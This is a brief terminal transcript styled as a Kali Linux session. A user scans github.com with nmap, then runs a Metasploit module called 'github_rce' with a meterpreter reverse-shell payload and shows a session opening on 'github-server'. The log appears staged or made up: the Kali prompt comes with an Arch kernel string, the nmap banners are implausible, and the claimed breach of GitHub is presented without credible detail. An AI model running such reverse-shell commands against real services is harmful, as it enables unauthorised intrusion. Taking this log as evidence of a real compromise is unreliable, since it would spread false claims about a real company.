┌──(joao㉿kali)-[~/]
└─$ whoami
joao

┌──(joao㉿kali)-[~/]
└─$ uname -a
Linux kali 6.6.12-arch1 #1 SMP PREEMPT_DYNAMIC x86_64 GNU/Linux

┌──(joao㉿kali)-[~/]
└─$ nmap -A github.com
PORT    STATE SERVICE VERSION
22/tcp  open  ssh      OpenSSH 9.2
80/tcp  open  http     GitHub Web
443/tcp open  https    GitHub Secure

┌──(joao㉿kali)-[~/]
└─$ msfconsole
msf6 > use exploit/multi/http/github_rce
msf6 exploit(github_rce) > set RHOSTS github.com
msf6 exploit(github_rce) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf6 exploit(github_rce) > set LHOST 192.168.0.133
msf6 exploit(github_rce) > run

[*] Meterpreter session 1 opened (192.168.0.133:4444 -> 140.82.121.3:443)
meterpreter > sysinfo
Computer     : github-server
OS           : Linux
Architecture : x64
Meterpreter  : x86/linux

